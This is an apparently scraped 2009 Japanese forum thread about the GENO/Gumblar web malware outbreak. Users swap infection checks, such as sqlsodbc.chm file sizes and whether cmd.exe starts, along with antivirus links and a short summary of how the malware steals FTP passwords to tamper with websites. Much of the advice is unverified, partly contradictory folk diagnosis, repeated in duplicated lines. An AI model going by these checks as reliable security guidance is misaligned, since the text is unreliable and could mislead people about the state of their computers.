■Windows 2000:
そもそも存在しないはずなので、
C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。
■確認方法
1.スタートから「ファイル名を指定して実行」
2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
→背景が黒いウィンドウが開いた場合3へ
→起動しない場合:感染疑い濃厚
3.背景が黒いウィンドウを選択。
小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー
Bavast!(無料のアンチウイルスソフト)で確認
ジャーン!ジャーン!
げぇ!GENO!
げぇ!GENO!
386=711です。
>>389=400、
>>767
ありがとうございます!
まとめサイトの感染判定で無事だったので、予防策もひとつづつ試していき
最後にこの設定をしようとしたら進めなくなったので助かりました。
>>389=400、
>>767
ありがとうございます!
まとめサイトの感染判定で無事だったので、予防策もひとつづつ試していき
最後にこの設定をしようとしたら進めなくなったので助かりました。
795 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 02:56:41 ID:radNm57b0
有志の皆様のお陰でやれることは大体やりつくした。
だが神経が高ぶって眠れそうにない。
だが神経が高ぶって眠れそうにない。
名前欄もまともに入れられないやつは全てスルーでおk?
>>788 / <三||三||三||三||三三三ヾ、===,、 Z G
ヽ l ||` ||ミ ||三||フ,|| ̄  ̄``ヾミノノ三三ヽ / E げ
ヽ / | | ヽ と 音 は || || ||/|| || __ | |ヽ三三;/| 7 N え
_/ ヽ / | | ま が わ || || ||/|| || ̄  ̄``| |、_ゞ、/|| || -'_O っ
ヤ ___/ ら わ || || ||r‐‡―‡―――‐--、.| | ||| || || ゝ
ヤ ぬ || ||/‡| ヽ、{ (_/``ヽ / | |'‐┘|| || || `>_
_|_______ _ ||,. ‡ | ' ̄ | ≡ l ̄ヽ, ヽ,| | 、||| || ||  ̄//L
_|_____ / ___``ヽ / ‡ |_ヽ0.,/ 三ヾ.0_/二 l| |^i||| || ||
| / // ||ー―--, ,___,ノ | '"~/ ―--三、 | |r'ノ || ‡ ‡
ヽ / / ./' || ( __ニ=― l ヽ、 ヽ、`` | |' l ‡
_/ ヽ / .句| || l /ヽ ̄ ̄``ヽヽ∪ | |)ヽ
_/ | || | / / .| !{ ヽ__ ノ } ノ |/ \二、 、
| || \ ― .| |ヽ ― ̄ ノ//| |(( / >、 \ 、
| / ――― ‐┼  ̄ ,.| |/ |\ _,、,_ / .//,| | )// ヽ、)〉
\_ | || ` ,. - ―/ | |(),l i川川リ //(_,| |// // /
| || / / / ./())| | 川リ //.((_,| |,' // /
| || / |/ /|(()| |ノツ //(())/| .| // /
| || / / /. |(_))| |/ //(())//| | // /
ヽ l ||` ||ミ ||三||フ,|| ̄  ̄``ヾミノノ三三ヽ / E げ
ヽ / | | ヽ と 音 は || || ||/|| || __ | |ヽ三三;/| 7 N え
_/ ヽ / | | ま が わ || || ||/|| || ̄  ̄``| |、_ゞ、/|| || -'_O っ
ヤ ___/ ら わ || || ||r‐‡―‡―――‐--、.| | ||| || || ゝ
ヤ ぬ || ||/‡| ヽ、{ (_/``ヽ / | |'‐┘|| || || `>_
_|_______ _ ||,. ‡ | ' ̄ | ≡ l ̄ヽ, ヽ,| | 、||| || ||  ̄//L
_|_____ / ___``ヽ / ‡ |_ヽ0.,/ 三ヾ.0_/二 l| |^i||| || ||
| / // ||ー―--, ,___,ノ | '"~/ ―--三、 | |r'ノ || ‡ ‡
ヽ / / ./' || ( __ニ=― l ヽ、 ヽ、`` | |' l ‡
_/ ヽ / .句| || l /ヽ ̄ ̄``ヽヽ∪ | |)ヽ
_/ | || | / / .| !{ ヽ__ ノ } ノ |/ \二、 、
| || \ ― .| |ヽ ― ̄ ノ//| |(( / >、 \ 、
| / ――― ‐┼  ̄ ,.| |/ |\ _,、,_ / .//,| | )// ヽ、)〉
\_ | || ` ,. - ―/ | |(),l i川川リ //(_,| |// // /
| || / / / ./())| | 川リ //.((_,| |,' // /
| || / |/ /|(()| |ノツ //(())/| .| // /
| || / / /. |(_))| |/ //(())//| | // /
ふたばは感染してないのかな?
>>796
んなモン自分で判断しろ
んなモン自分で判断しろ
ノートンは対応しないつもりか?
カスペルスキーに乗り換えようかな
カスペルスキーに乗り換えようかな
UnderForge of Lackの焼却炉全焼き推奨にすれば、多少マシになるような気がした。
803 :genoマカー3/2:2009/05/17(日) 03:04:02 ID:UQnEuMJQ0
sqlsodbc.chmが表示されない/まとめWikiに新しく上がった要チェックファイルが見つからない場合
・不可視属性ファイルを可視化する→ターミナル起動
不可視含め全ファイル表示:defaults write com.apple.finder AppleShowAllFiles true
リターンしてFinder再起動:killall Finder
全部のFinderが消えて再起動し、不可視ファイルが表示された状態になる。
※戻すとき:defaults write com.apple.finder AppleShowAllFiles false
不可視→可視はTinkerTool、Onyxなどを使うのもおk
TinkerTool:http://www.bresink.de/osx/0TinkerTool/download.html
Onyx:http://www.titanium.free.fr/pgs2/english/download.html
マカー用ウイルススキャンソフト(フリー)
ClamXav:http://www.clamxav.com/
左のページナビのDLをクリックすればOSのバージョンごとに案内が出る。
ダウンロードしたらまず「ウイルス定義を更新」をクリックして最新の定義をいれること。
環境設定のスケジュールで定期スキャンが設定できるが、ウイルス定義の更新は自動では
されないので、なるべく使用せず手動スキャン推奨。
フォルダ監視ができるのでサイトのローカル保存フォルダを指定するのは大丈夫。
※Mac対応した亜種が発生して感染しても定義を更新するまで引っかからない可能性がある
※過信しないことが最大のセキュリティ
-----------------ここまで------------------
連投引っかかってた ほんとツギハギしただけでスマソ
詳しい人ツッコミよろしく
・不可視属性ファイルを可視化する→ターミナル起動
不可視含め全ファイル表示:defaults write com.apple.finder AppleShowAllFiles true
リターンしてFinder再起動:killall Finder
全部のFinderが消えて再起動し、不可視ファイルが表示された状態になる。
※戻すとき:defaults write com.apple.finder AppleShowAllFiles false
不可視→可視はTinkerTool、Onyxなどを使うのもおk
TinkerTool:http://www.bresink.de/osx/0TinkerTool/download.html
Onyx:http://www.titanium.free.fr/pgs2/english/download.html
マカー用ウイルススキャンソフト(フリー)
ClamXav:http://www.clamxav.com/
左のページナビのDLをクリックすればOSのバージョンごとに案内が出る。
ダウンロードしたらまず「ウイルス定義を更新」をクリックして最新の定義をいれること。
環境設定のスケジュールで定期スキャンが設定できるが、ウイルス定義の更新は自動では
されないので、なるべく使用せず手動スキャン推奨。
フォルダ監視ができるのでサイトのローカル保存フォルダを指定するのは大丈夫。
※Mac対応した亜種が発生して感染しても定義を更新するまで引っかからない可能性がある
※過信しないことが最大のセキュリティ
-----------------ここまで------------------
連投引っかかってた ほんとツギハギしただけでスマソ
詳しい人ツッコミよろしく
804 :GENO:2009/05/17(日) 03:06:20 ID:7TapFnnMO
今は他板住人も出入りするから仕方ないね
806 :geno:2009/05/17(日) 03:09:39 ID:F3VlOqPh0
小規模な同人系リンクサイトを運営しています。
Mac機で全部リンク先チェックしにいきました。
1件アウトでしたのでリンクurlをダミーに置き換えて仮登録にして
当該サイトの管理人に対策要請のメールを送りました。
ジャンルは既に報告されているので書きませんが
他人事だと思ってたわけじゃないけどほんとに火の粉が降ってきたので慄然としているところです
Mac機で全部リンク先チェックしにいきました。
1件アウトでしたのでリンクurlをダミーに置き換えて仮登録にして
当該サイトの管理人に対策要請のメールを送りました。
ジャンルは既に報告されているので書きませんが
他人事だと思ってたわけじゃないけどほんとに火の粉が降ってきたので慄然としているところです
ごめん名前抜けてた・・・orz
とりあえずジャンル幸に緊急のお知らせですってメルフォから送った
幸の最後の更新06年だが気づいてもらえるだろうか・・・
とりあえずジャンル幸に緊急のお知らせですってメルフォから送った
幸の最後の更新06年だが気づいてもらえるだろうか・・・
810 :GENO:2009/05/17(日) 03:13:15 ID:PJLnt0u30
まとめ管理人様、乙です。
Vistaです。
アドビ Playerを削除しました。
Acrobat Readerは仕事で使うので、
最新の物を入れました。
Java切り・IE8導入しました。
ウィルスバスターは入っています。
質問です。
Acrobat ReaderおよびPDFの拡張子割り当て機能の
外し方がわかりません。
「C:\Windows\Help\mui」以下のディレクトリの
「C:\Windows\Help\mui」をどうやって画面上に
表示させるのかがわかりません。
どのキーを押せばいいのでしょうか?
Vistaです。
アドビ Playerを削除しました。
Acrobat Readerは仕事で使うので、
最新の物を入れました。
Java切り・IE8導入しました。
ウィルスバスターは入っています。
質問です。
Acrobat ReaderおよびPDFの拡張子割り当て機能の
外し方がわかりません。
「C:\Windows\Help\mui」以下のディレクトリの
「C:\Windows\Help\mui」をどうやって画面上に
表示させるのかがわかりません。
どのキーを押せばいいのでしょうか?
スマン、マジで>>803の意味がよくわからない。
sqlsodbc.chmとMacに何の関係があるんだ?
sqlsodbc.chmとMacに何の関係があるんだ?
サイト巡りしたいのに怖くてできん…
まだ報告あがってないけど油断はできないよなー
まだ報告あがってないけど油断はできないよなー
ウィルスって誰かが作ったもんなの?そんな高度なウィルスなんて作れるもんなんですか?
だとしたら嫌だな
だとしたら嫌だな
814 :GENO:2009/05/17(日) 03:16:28 ID:NfFnEcJ60
いいかげんチラ裏報告とか自分がセーフだったとか
まとめやスレ見ればわかることを質問するのやめないか
>>803
詳しくていいんだけど、マカーは今のところ感染報告が一切ないわけで
そこまで場所を割いて懇切丁寧な説明が必要なのか疑問。
被害が深刻なWinより丁寧になってるよ?
もっと詳しい対策をとりたい人はマク板や脳板へぐらいでいいんじゃないの
まとめやスレ見ればわかることを質問するのやめないか
>>803
詳しくていいんだけど、マカーは今のところ感染報告が一切ないわけで
そこまで場所を割いて懇切丁寧な説明が必要なのか疑問。
被害が深刻なWinより丁寧になってるよ?
もっと詳しい対策をとりたい人はマク板や脳板へぐらいでいいんじゃないの
>>760
横から失礼します
FirefoxのアドオンでAdobe Reader があったんですが
それがアップデートしたらアドオンから消えてるみたいなんです
スタート→プログラムではAdobe Reader の最新バージョンになってるんですが
FirefoxのアドオンではAdobe Reader の代わりに?Adobe Acrobat でいいんでしょうか
横から失礼します
FirefoxのアドオンでAdobe Reader があったんですが
それがアップデートしたらアドオンから消えてるみたいなんです
スタート→プログラムではAdobe Reader の最新バージョンになってるんですが
FirefoxのアドオンではAdobe Reader の代わりに?Adobe Acrobat でいいんでしょうか
お前ら馬鹿すぎ
こんな低性能ウイルスなんぞ常時に隣り合わせだと知れ
こんな低性能ウイルスなんぞ常時に隣り合わせだと知れ
cmd.exeもregedit.exeも起動しない
sqlsodbc.chmは1,323 バイト
更新日時は2009年3月21日、23:07:24
これって感染してるってこと?
自分サーチ運営してるんだが、閉鎖したほうが良いのだろうか。
ソース見た限りではサーチは感染していないようなのだけれど。
sqlsodbc.chmは1,323 バイト
更新日時は2009年3月21日、23:07:24
これって感染してるってこと?
自分サーチ運営してるんだが、閉鎖したほうが良いのだろうか。
ソース見た限りではサーチは感染していないようなのだけれど。
>>819
どう見ても真っ黒です本当にありがとうございました
どう見ても真っ黒です本当にありがとうございました
823 :GENO:2009/05/17(日) 03:24:14 ID:VGXelXZT0
IE8報告があるけど、IE8は画像経由で感染しないってだけだよな
火狐やそのほかのブラウザが推奨されてるのは、簡単にjs切れるからってことでおk?
ウイルスの爆撃対象になってるのはどれも同じなんだよね?
火狐でflash player導入しようと思ったらおそらくvistaにはねられた
vista使いで火狐考えてる人はflash player一筋縄じゃいかないかも
火狐やそのほかのブラウザが推奨されてるのは、簡単にjs切れるからってことでおk?
ウイルスの爆撃対象になってるのはどれも同じなんだよね?
火狐でflash player導入しようと思ったらおそらくvistaにはねられた
vista使いで火狐考えてる人はflash player一筋縄じゃいかないかも
>>819
サイトが感染してないなら下手に動かすのも危ないしひとまず放置
パソコンはクリーンインスコ
前にも同じような人いるんだからまずはログ検索するなり努力しなよ
そんなんだとまた違うウイルスに感染するかもよ
サイトが感染してないなら下手に動かすのも危ないしひとまず放置
パソコンはクリーンインスコ
前にも同じような人いるんだからまずはログ検索するなり努力しなよ
そんなんだとまた違うウイルスに感染するかもよ
>>823
flash playerなんてUACで許可してやればインストールできるでしょ
flash playerなんてUACで許可してやればインストールできるでしょ
cmdが起動しない
バイト数が明らかにおかしい
要注意だな
バイト数が明らかにおかしい
要注意だな
vistaで、C:\Windows\Help\mui\0411までいけるのにsqlsodbc.chmがないんですが‥どうすれば、、
答えてくれた人ありがとう。
サーチは何故かFTP最近使えなくて(これはウィルス関係ある?)
最近はずっとファイルマネージャでアップロードしてたんだけど大丈夫かな?
聞いてばっかりですいません
サーチは何故かFTP最近使えなくて(これはウィルス関係ある?)
最近はずっとファイルマネージャでアップロードしてたんだけど大丈夫かな?
聞いてばっかりですいません
sqlsodbc.chmが49.5kbyte
アウセフ?
アウセフ?
>827
UACで許可出した後に「この動作を停止しました」っていうのが出るんだ
他のexeを実行したときにも同じ症状が出て、そのときもvista特有の対処が必要だったから
今回もそれだろうと思ったんだが
UACで許可出した後に「この動作を停止しました」っていうのが出るんだ
他のexeを実行したときにも同じ症状が出て、そのときもvista特有の対処が必要だったから
今回もそれだろうと思ったんだが
834 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 03:28:30 ID:bMv9yql40
>>828
要注意じゃなくて真っ黒だと思うが
要注意じゃなくて真っ黒だと思うが
×sqlsodbc.chmが49.5kbyte
〇sqlsodbc.chmが47.5kbyte
半端な…
〇sqlsodbc.chmが47.5kbyte
半端な…
>>832
まとめも見れないようなカスはパソコン切って寝てろ
まとめも見れないようなカスはパソコン切って寝てろ
パソコン普通に起動して普通にネットに繋がる状態なら、まだウィルスには感染してないってことで大丈夫かな
838 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 03:29:30 ID:/QQFgMqg0
同人板には「テンプレを読んではいけません」「スレを一通り読むのも禁止」
「ちょっと調べればすぐに分かることでも人に聞いて無駄にスレを進行させろ」
みたいなローカルルールでもあるのか?
いくらなんでも酷すぎるだろ
「ちょっと調べればすぐに分かることでも人に聞いて無駄にスレを進行させろ」
みたいなローカルルールでもあるのか?
いくらなんでも酷すぎるだろ
>>810
今は気軽にググれと言える状況じゃないし、混乱してるだろうから書く
スタート(左下の窓のアイコン)→コンピューター→Windows Vista(C)→Windows
→Help→mui
この後は0409か0411かわからないけど、数字の羅列のフォルダがあるから
お探しのものはそこの中
ついでに数人の友だちに聞かれたから書いておくけど、
「ファイル名を指定して実行」は、vistaの場合スタートのところから
起動できるようになってない(いじってなければ)
スタート開いて窓アイコンのすぐ上に検索のためのテキスト領域あるから
そこにそのまま「ファイル名を指定して実行」と書けば起ち上がる
今は気軽にググれと言える状況じゃないし、混乱してるだろうから書く
スタート(左下の窓のアイコン)→コンピューター→Windows Vista(C)→Windows
→Help→mui
この後は0409か0411かわからないけど、数字の羅列のフォルダがあるから
お探しのものはそこの中
ついでに数人の友だちに聞かれたから書いておくけど、
「ファイル名を指定して実行」は、vistaの場合スタートのところから
起動できるようになってない(いじってなければ)
スタート開いて窓アイコンのすぐ上に検索のためのテキスト領域あるから
そこにそのまま「ファイル名を指定して実行」と書けば起ち上がる
840 :GENO:2009/05/17(日) 03:31:04 ID:NfFnEcJ60
>>803を勧められない理由は不可視ファイルの可視化。
普段やりつけない人がやるにはリスクがある。
それよりClamXavのスキャン指定で不可視ファイルにアクセスするほうが
現実的で早くないかな
ttp://ewa4618.wed.macserver.jp/
>不可視フォルダにアクセスするには、キーボードでまず“/”を入力し、
>続けて目的のフォルダのフルパスを入力してください。
↑フォルダの位置さえはっきりしていればこれでおk
普段やりつけない人がやるにはリスクがある。
それよりClamXavのスキャン指定で不可視ファイルにアクセスするほうが
現実的で早くないかな
ttp://ewa4618.wed.macserver.jp/
>不可視フォルダにアクセスするには、キーボードでまず“/”を入力し、
>続けて目的のフォルダのフルパスを入力してください。
↑フォルダの位置さえはっきりしていればこれでおk
>>837
全然大丈夫じゃねえよwww
全然大丈夫じゃねえよwww
そういやひとつ気になってたんだけど。
プニル使ってるんだが、プニルでJavascript切る設定にしておけば
IEのインターネットオプションでJavascript無効にしなくても大丈夫なのかな。
専ブラもJavascript使ってるから
無効にすると動作おかしくなってかなり使いづらいんだ。
プニル使ってるんだが、プニルでJavascript切る設定にしておけば
IEのインターネットオプションでJavascript無効にしなくても大丈夫なのかな。
専ブラもJavascript使ってるから
無効にすると動作おかしくなってかなり使いづらいんだ。
845 :GENO:2009/05/17(日) 03:32:36 ID:o++pde6y0
ttp://www.virustotal.com/jp/analisis/129207c26f261e1ea48589b1815af3f7
5月16日現在のウイルス対応状況
a-squared AntiVir Antiy-AVL Authentium Avast
BitDefender Comodo eTrust-Vet F-Prot F-Secure
GData Ikarus Kaspersky McAfee McAfee+Artemis
McAfee-GW-Edition Microsoft(悪意のある略) NOD32
Sophos Sunbelt Symantec TrendMicro ViRobot
5月16日現在のウイルス対応状況
a-squared AntiVir Antiy-AVL Authentium Avast
BitDefender Comodo eTrust-Vet F-Prot F-Secure
GData Ikarus Kaspersky McAfee McAfee+Artemis
McAfee-GW-Edition Microsoft(悪意のある略) NOD32
Sophos Sunbelt Symantec TrendMicro ViRobot
パソコンに感染したら調べなくても起動した段階や操作中に一目で分かる?
分からないままネットしてたらどうしよう
分からないままネットしてたらどうしよう
>>844って感染サイトじゃなかったっけ
気をつけて
気をつけて
一応ウイルスセキュリティでは白
もし感染してる場合、一度電源切ったら再起動しないオワタ状態になる?
もし感染してる場合、一度電源切ったら再起動しないオワタ状態になる?
854 :GENO:2009/05/17(日) 03:37:36 ID:Izv+58ucO
規制中なので携帯から失礼
コマンドプロンプトは感染初期に立ち上げると重症化するようだ
確認はディレクトリの方を推奨
コマンドプロンプトは感染初期に立ち上げると重症化するようだ
確認はディレクトリの方を推奨
>>832
cmd.exeさえ動けば
cmd.exeさえ動けば
個人的にはFTPのパス抜いてーってのが抜き方はいくらでもあるが物凄く現実味が無い
アカウントハッキングが目的ならまだしもHTML改変ならローカルに保存されている
HTMLファイルを直接改変するようにした方が良いだろうに・・・
アカウントハッキングが目的ならまだしもHTML改変ならローカルに保存されている
HTMLファイルを直接改変するようにした方が良いだろうに・・・
>>816
一応読んではみたんだけど。不可視属性もなにも、sqlsodbc.chmはWindowsの話であって、Macには関係ないだろ?
>>803で何を可視化しようとしてるのかわからないんだ。
それと、Adobe ReaderはHFS+でCase Sensitiveにしてる場合、環境設定が動作しないんじゃないかと思う。
大文字小文字を区別しないってやつ。
一応読んではみたんだけど。不可視属性もなにも、sqlsodbc.chmはWindowsの話であって、Macには関係ないだろ?
>>803で何を可視化しようとしてるのかわからないんだ。
それと、Adobe ReaderはHFS+でCase Sensitiveにしてる場合、環境設定が動作しないんじゃないかと思う。
大文字小文字を区別しないってやつ。
>>857
FTP通信を盗聴するトロイが内部に潜んでいると考えてみたらどう?
FTP通信を盗聴するトロイが内部に潜んでいると考えてみたらどう?
すまん、>>858の「区別しない」は間違い、「区別する」が正しいです。
861 : :2009/05/17(日) 03:42:39 ID:WbbmDS0L0
テンプレやまとめサイトに書いてあることなら「そこに書いてあるから読め」とだけ答えろよ
既出の質問なら「同じ質問があるから探せ」で終わらせろ 絶対に答え(エサ)はやるな
「次からは読んでね」なんて注意しても聞かない しつけのなっていない犬畜生以下のバカなんだから
お手やお座りをする前にエサをやったって覚えるわけないだろ
既出の質問なら「同じ質問があるから探せ」で終わらせろ 絶対に答え(エサ)はやるな
「次からは読んでね」なんて注意しても聞かない しつけのなっていない犬畜生以下のバカなんだから
お手やお座りをする前にエサをやったって覚えるわけないだろ
863 :GENO:2009/05/17(日) 03:44:37 ID:NfFnEcJ60
>>858
Macだけなら無関係だが、BootCampでWin入れてるマカー用でしょ
Mac側から感染をチェックしたい場合ってことじゃないの?
説明不足だし、自分もその項目は不要な気がする。
マカでもブーキャンWinしてたら、Winでやらなきゃいけない対処はどうせ全部やるべきだから
Macだけなら無関係だが、BootCampでWin入れてるマカー用でしょ
Mac側から感染をチェックしたい場合ってことじゃないの?
説明不足だし、自分もその項目は不要な気がする。
マカでもブーキャンWinしてたら、Winでやらなきゃいけない対処はどうせ全部やるべきだから
864 :GENO:2009/05/17(日) 03:45:27 ID:C9Hc9U/u0
既出の質問への答えも理解できないんじゃね?
IDはあぼ〜んできるから便利だなぁ
>>863
>Macだけなら無関係だが、BootCampでWin入れてるマカー用でしょ
>>726にそのあたりの説明は書いたつもりなんだが、足りなかったか
一応その項目について書くべきかは>>3の人に確認した上でのことなんだ
>Macだけなら無関係だが、BootCampでWin入れてるマカー用でしょ
>>726にそのあたりの説明は書いたつもりなんだが、足りなかったか
一応その項目について書くべきかは>>3の人に確認した上でのことなんだ
>>858
MacのBootCampっていう機能で、OSXとWindowsがデュアルブートできるんだよ。
MacにWin入れてる人向けの話。
自分もマカでブーキャンしてるけど、ターミナルいじるとなると敷居が高い。
MacのBootCampっていう機能で、OSXとWindowsがデュアルブートできるんだよ。
MacにWin入れてる人向けの話。
自分もマカでブーキャンしてるけど、ターミナルいじるとなると敷居が高い。
869 :geno:2009/05/17(日) 03:50:35 ID:SK1PylRj0
>>832
プロパティ見て50727byteならセフセフらしいけど
プロパティ見て50727byteならセフセフらしいけど
870 :810:2009/05/17(日) 03:52:37 ID:PJLnt0u30
Mac等のマイナーOS使ってる奴なんて大概Windowsも入れてるからなあ(そうでないとネット使う上で不便すぎる)
VISTA〜以外のOSは安心できなくなったなあ
VISTA〜以外のOSは安心できなくなったなあ
>>867
>その項目に
ごめんコレ不可視→可視化の方法ね
ホント頭ねてるわ…
>>858
>Adobe ReaderはHFS+でCase Sensitiveにしてる場合、環境設定が動作しないんじゃないかと思う。
これが自分にはよくわからないので詳しい人お願いします
>その項目に
ごめんコレ不可視→可視化の方法ね
ホント頭ねてるわ…
>>858
>Adobe ReaderはHFS+でCase Sensitiveにしてる場合、環境設定が動作しないんじゃないかと思う。
これが自分にはよくわからないので詳しい人お願いします
自分マカでブーキャンなんだがwinでサイト見てなきゃ問題ないよな?
しかしウイルスの広まり具合すごいな
ブクマめぐってみたら数日前はなかったのに
ほとんどのサイトがウイルス警告してた
しかしウイルスの広まり具合すごいな
ブクマめぐってみたら数日前はなかったのに
ほとんどのサイトがウイルス警告してた
さっきMediaManager久しぶりに起動させたんだが何度やっても読み込み途中で終了になる
でもこれってウイルスとは関係ないよな…?初心者ですまん
ちなみにsqlsodbc.chmのサイズは問題ない
でもこれってウイルスとは関係ないよな…?初心者ですまん
ちなみにsqlsodbc.chmのサイズは問題ない
>>876
不安ならクリーンインストールしてスッキリすればいいよw
不安ならクリーンインストールしてスッキリすればいいよw
/ ̄ ̄ ̄ / /''7 ./''7 / ̄/ /''7
./ ./ ̄/ / /__/ / / ____  ̄ / /
'ー' _/ / ___ノ / /____/ ___ノ /
/___ノ /____,./ /____,./
_ノ ̄/ / ̄/ /''7 / ̄ ̄ ̄/ / ̄/ /'''7'''7
/ ̄ /  ̄ / /  ̄ フ ./ / ゙ー-; ____ / / /._
 ̄/ / ___ノ / __/ (___ / /ー--'゙ /____/ _ノ /i i/ ./
/__/ /____,./ /___,.ノゝ_/ /_/ /__,/ ゝ、__/
これ最強
>>875
同じくマカでブーキャンしてて、Winでサイトはみてない
上記にあるようにWinにMac上から最新ClamXavをかけてみたが
今のところなにもなかったようだ
しかしうちのジャンル、感染報告あるのに
どのサイトいってもウイルス警告なかったぞ
うちは偏狭のしがないサイトだからなあ…
誰か気づいてくれるといいんだけど
同じくマカでブーキャンしてて、Winでサイトはみてない
上記にあるようにWinにMac上から最新ClamXavをかけてみたが
今のところなにもなかったようだ
しかしうちのジャンル、感染報告あるのに
どのサイトいってもウイルス警告なかったぞ
うちは偏狭のしがないサイトだからなあ…
誰か気づいてくれるといいんだけど
ここで勧められてるavastインストールしたら再起動要求後、OS立ち上がる前にスキャン開始。
XP起動してログイン時に個人プロファイルが壊れてますとか何とか出て
一度は立ち上がったんだけど、再起動したら黒い画面から動かなくなった…。
avastいれる前の感染チェックでは白だった。
元々HDDが寿命寸前だったのもあるかもしれないけど、HDD逝ったのは確実なのかな。
ウイルスとは微妙に関係なくてスマソ。スレ違いなら誘導してもらえると助かります。
XP起動してログイン時に個人プロファイルが壊れてますとか何とか出て
一度は立ち上がったんだけど、再起動したら黒い画面から動かなくなった…。
avastいれる前の感染チェックでは白だった。
元々HDDが寿命寸前だったのもあるかもしれないけど、HDD逝ったのは確実なのかな。
ウイルスとは微妙に関係なくてスマソ。スレ違いなら誘導してもらえると助かります。
BootCampは使ったことないんだけど、MacのFinderで不可視属性のファイルを可視化するよう設定しなくても、
マウントしたNTFS(あるいはFAT)パーティションの隠しファイルは見えるような気がするんだけど違うのか。
マウントしたNTFS(あるいはFAT)パーティションの隠しファイルは見えるような気がするんだけど違うのか。
たとえPCに詳しくなくても日本語は読めるだろ
そしてここに書き込めるということは、ブラウザの入力欄がどこか知っていて
そこにマウスカーソルを合わせて文字の入力が出来る状態にして
キーボードで文字が打てて書き込みボタンを押せるってことだろ
それだけ出来れば十分だよ 「自分で調べられる」んだよ 何でそうしないんだよ?
そしてここに書き込めるということは、ブラウザの入力欄がどこか知っていて
そこにマウスカーソルを合わせて文字の入力が出来る状態にして
キーボードで文字が打てて書き込みボタンを押せるってことだろ
それだけ出来れば十分だよ 「自分で調べられる」んだよ 何でそうしないんだよ?
>>880
元々入ってたアンチウイルスソフトはアンインストールした?
元々入ってたアンチウイルスソフトはアンインストールした?
まとめサイトのcmd実行、
ファイルの容量を確認して問題なかったんだけど
オンラインスキャンをしたらなんかBackdoorタイプのウィルスに
感染してたらしく、削除して終了したんだけど
これってやばいの?
GENOウィルスって調べてみたけど
トロイとかバックドアとかそういう種類がよく分からないんだけど何に属するの?
ファイルの容量を確認して問題なかったんだけど
オンラインスキャンをしたらなんかBackdoorタイプのウィルスに
感染してたらしく、削除して終了したんだけど
これってやばいの?
GENOウィルスって調べてみたけど
トロイとかバックドアとかそういう種類がよく分からないんだけど何に属するの?
@Niftyのウイルスチェックで Trojan-PSW.Win32.Kates.c が出たぜー\(^o^)/
駆除出来ないのなこれ
駆除出来ないのなこれ
>>880
のーとん先生に嫉妬するって友達が言ってたけどそういうことでなくて?
のーとん先生に嫉妬するって友達が言ってたけどそういうことでなくて?
・sqlsodbc.chmのファイルサイズおk
・niftyオンラインスキャン問題なし
・ウイルスバスターでも問題なし
・チェッカー?にぶち込んでもおk
・自サイトのソースもおk
だったんだがこれは白でおkですか?
感染するのも怖いが何より自分がばらまく可能性があるとなると・・・・・・
・niftyオンラインスキャン問題なし
・ウイルスバスターでも問題なし
・チェッカー?にぶち込んでもおk
・自サイトのソースもおk
だったんだがこれは白でおkですか?
感染するのも怖いが何より自分がばらまく可能性があるとなると・・・・・・
sqlsodbc.chmが49.5kb(50.727バイト)
Vistaなんだけど大丈夫?
Vistaなんだけど大丈夫?
890 :GENO:2009/05/17(日) 04:31:13 ID:3+n4Bxrc0
さすがにこの時間だからかスレ進行がゆっくりになってきたな
絶対ヤバいと踏んでいた弟のマシン(XP)チェックしたけど異常なし
親のノートはMeとVistaで異常なし、マイマシン(XP)も未だ異常なし。
噂立ってすぐ対処始めたのも良かったんだろうけど
スレ見てると、基本的に運がよかったんだなウチは…と思うわ
明日の夕方、イベント終了後からはオフに意識行ってた人がこっち流れてきてスレ加速するだろうけど
まとめ見れば分かりそうな質問には>>3で済ませんの?
それともどっかで提案あったテンプレレスみたいなの用意しとくの?
絶対ヤバいと踏んでいた弟のマシン(XP)チェックしたけど異常なし
親のノートはMeとVistaで異常なし、マイマシン(XP)も未だ異常なし。
噂立ってすぐ対処始めたのも良かったんだろうけど
スレ見てると、基本的に運がよかったんだなウチは…と思うわ
明日の夕方、イベント終了後からはオフに意識行ってた人がこっち流れてきてスレ加速するだろうけど
まとめ見れば分かりそうな質問には>>3で済ませんの?
それともどっかで提案あったテンプレレスみたいなの用意しとくの?
>>888-889
まとめてwiki見てください
まとめてwiki見てください
>>882
ググると感染やらなんやら言われてるからじゃねーの?
ググると感染やらなんやら言われてるからじゃねーの?
894 :GENO:2009/05/17(日) 04:34:07 ID:3+n4Bxrc0
>>893
ググらんでもまとめWiki見ればよくね?とは思う。
ググっただけで感染というのは、あり得るとすればFirefoxで先読み機能放置状態の時だけだな。
それを切る方法もまとめWikiには書いてある。
まとめWikiのアドレスは>>1に貼ってある。
ググらんでもまとめWiki見ればよくね?とは思う。
ググっただけで感染というのは、あり得るとすればFirefoxで先読み機能放置状態の時だけだな。
それを切る方法もまとめWikiには書いてある。
まとめWikiのアドレスは>>1に貼ってある。
>>873
>>859だと思うぞ
関連サイトから↓
---
ホームページに不正に埋め込まれたJavaScriptやIFRAMEが不正に SWFやPDFを開かせる
アップデートを行っていないユーザの脆弱性で、Flash Player や Adobe Acrobat Readerがクラッシュ。
クラッシュ時にマルウェア(PE型:xxxxx.exe)を実行。
実行されたマルウェアは、内部にトロイを埋め込み、感染PCのインターネットアクセスを監視、特に FTPアクセスを監視して ID/Passwordを盗む。
盗んだID/Passを使って、ホストへ(おそらく自動巡回で)不正侵入、改ざんコードを埋め込む
>>859だと思うぞ
関連サイトから↓
---
ホームページに不正に埋め込まれたJavaScriptやIFRAMEが不正に SWFやPDFを開かせる
アップデートを行っていないユーザの脆弱性で、Flash Player や Adobe Acrobat Readerがクラッシュ。
クラッシュ時にマルウェア(PE型:xxxxx.exe)を実行。
実行されたマルウェアは、内部にトロイを埋め込み、感染PCのインターネットアクセスを監視、特に FTPアクセスを監視して ID/Passwordを盗む。
盗んだID/Passを使って、ホストへ(おそらく自動巡回で)不正侵入、改ざんコードを埋め込む
サイトに注意喚起してきた。(もち白でした)
最近全然更新してない弱小サイトだから2人/日くらいしか来ないけど。
FTPもクレジットカードも使わないから、あんま危機感ないけど他の人はそうじゃないもんな。
ここ二ヶ月くらい同人サイト巡ってなくて逆によかったかもなぁ。
最近全然更新してない弱小サイトだから2人/日くらいしか来ないけど。
